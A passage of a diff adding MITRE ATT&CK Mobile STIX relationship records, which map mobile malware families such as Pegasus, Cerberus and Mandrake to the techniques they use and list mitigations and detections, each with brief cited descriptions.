"x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c656539-aa1e-42db-9016-d38f1daaae16", + "created": "2023-01-18T19:20:26.156Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:06:05.822Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can collect user SMS messages.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6001f77a-da30-4ebc-85fd-5bf9afe5f0a1", + "created": "2023-03-15T16:24:12.588Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:24:12.588Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--393300c4-6852-466d-a163-1d51330fe055", + "created": "2023-03-20T18:45:39.292Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:48:50.839Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--82b58c75-239e-4dac-b848-bc1f3354adc4", + "created": "2023-03-20T18:41:18.288Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:18.288Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4ee57616-7205-490c-86c3-c27dcffd8689", + "created": "2022-04-06T13:35:43.203Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Recent OS versions have limited access to certain APIs unless certain conditions are met, making [Data Manipulation](https://attack.mitre.org/techniques/T1641) more difficult", + "modified": "2022-04-06T13:35:43.203Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51d31e17-6c80-4ab3-9e8e-6231483e0999", + "created": "2020-11-24T17:55:12.818Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:12.197Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can register for the `BOOT_COMPLETED` broadcast intent.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a34f3873-3df7-4e93-915c-fc2b4af3444d", + "created": "2020-07-15T20:20:59.380Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mandrake](https://attack.mitre.org/software/S0485) has used Firebase for C2.(Citation: Bitdefender Mandrake)", + "modified": "2022-04-18T19:18:24.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dbef53a9-f9c4-4582-8e93-349ad488de12", + "created": "2023-02-28T21:42:06.525Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:27:42.197Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can request permission to view call logs.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f9d0cfb5-aeda-4de4-9c72-7098297555ae", + "created": "2019-09-04T20:01:42.753Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Nightwatch screencap April 2016", + "url": "https://wwws.nightwatchcybersecurity.com/2016/04/13/research-securing-android-applications-from-screen-capture/", + "description": "Nightwatch Cybersecurity. (2016, April 13). Research: Securing Android Applications from Screen Capture (FLAG_SECURE). Retrieved November 5, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Application developers can apply the `FLAG_SECURE` property to sensitive screens within their apps to make it more difficult for the screen contents to be captured.(Citation: Nightwatch screencap April 2016) ", + "modified": "2022-04-01T13:31:59.712Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38ec048f-7f6e-4bbd-9455-1b1e54968af4", + "created": "2023-03-30T15:18:37.934Z", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T15:18:37.934Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can take screenshots and abuse the Android Screen Cast feature to capture screen data.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2e3a5d0d-a80a-4606-8be2-208302e995d1", + "created": "2020-12-24T21:45:56.920Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:16:17.615Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has attempted to trick users into enabling installation of applications from unknown sources.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1250f91c-723d-4b4c-afea-b3a71101951f", + "type": "relationship", + "created": "2019-08-07T15:57:13.415Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019." + } + ], + "modified": "2019-09-15T15:36:42.339Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can query the device's IMEI.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--269d4409-e287-4ef3-b5f3-765ec03e503e", + "created": "2020-06-02T14:32:31.900Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:18:38.700Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) grants itself permissions by injecting its hash into the kernel’s trust cache.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d621eba9-676f-47a4-8358-d68eeff2fb9a", + "created": "2023-03-03T16:25:09.978Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:25:09.978Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) is believed to have initially infected devices using internet traffic hijacking to generate abnormal popups.(Citation: paloalto_yispecter_1015) ", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--57df3046-2f14-4bb8-93e9-84a9c8b46791", + "created": "2022-03-30T19:33:17.520Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Inform users that device rooting or granting unnecessary access to the accessibility service presents security risks that could be taken advantage of without their knowledge.", + "modified": "2022-03-30T19:33:17.520Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4f2ae057-ef0b-4995-b24d-348a76a74a4f", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) uses SMS for command and control.(Citation: Lookout-Pegasus)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--75770898-93a7-45e3-bdb2-03172004a88f", + "created": "2022-03-30T14:49:47.451Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android-VerifiedBoot", + "url": "https://source.android.com/security/verifiedboot/", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android Verified Boot can detect unauthorized modifications made to the system partition, which could lead to execution flow hijacking.(Citation: Android-VerifiedBoot) ", + "modified": "2022-03-30T14:49:47.451Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6d88242f-e45b-481c-bd41-b66a662618ce", + "created": "2022-04-06T13:57:24.730Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:57:24.730Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--76c12fc8-a4eb-45d6-a3b7-e371a7248f69", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bd351b17-e995-4528-bbea-e1138c51476a", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.683Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) exfiltrates data from over 40 apps such as WeChat, Facebook, WhatsApp, Skype, and others.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--88ea5004-8bdb-4af4-a2dc-a8c56236ff03", + "type": "relationship", + "created": "2020-12-17T20:15:22.449Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.449Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can access the device’s microphone.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--37123a8d-5c03-459c-bd0b-c17e2ee75a10", + "type": "relationship", + "created": "2020-06-26T15:32:25.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:32:25.074Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can update the malicious payload module on command.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6294e276-e4ac-4097-a5cd-3b81e0d4498f", + "type": "relationship", + "created": "2020-12-14T15:02:35.287Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T15:02:35.290Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) has implemented functions in native code.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b81a284d-34ec-4e61-a073-bf6cd85e4c3f", + "created": "2020-10-29T19:01:13.839Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:54:05.374Z", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) can prevent the user from interacting with the UI by using a carefully crafted \"call\" notification screen. This is coupled with overriding the `onUserLeaveHint()` callback method to spawn a new notification instance when the current one is dismissed. (Citation: Microsoft MalLockerB)", + "relationship_type": "uses", + "source_ref": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2f1e5d77-0054-4f8a-8e01-7c0318278a76", + "created": "2019-10-18T14:50:57.472Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates frequently contain patches for known exploits.", + "modified": "2022-03-25T14:12:54.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4d7e937d-7ea1-49cb-939c-5244815e51d7", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:03:03.296Z", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) uses HTTP for command and control.(Citation: FireEye-RuMMS)", + "relationship_type": "uses", + "source_ref": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--27c8d474-f3f8-4a0e-a317-7e57b9de620c", + "type": "relationship", + "created": "2020-07-27T14:14:56.954Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-10T22:18:20.777Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can obtain root access via a rooting trojan in its infection chain.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--34a8a945-cc6c-474b-8db1-ffe8b5ecf99f", + "created": "2019-11-21T19:16:34.776Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint SimBad 2019", + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:53.855Z", + "description": "[SimBad](https://attack.mitre.org/software/S0419) registers for the `BOOT_COMPLETED` and `USER_PRESENT` broadcast intents, which allows the software to perform actions after the device is booted and when the user is using the device, respectively.(Citation: CheckPoint SimBad 2019)", + "relationship_type": "uses", + "source_ref": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": 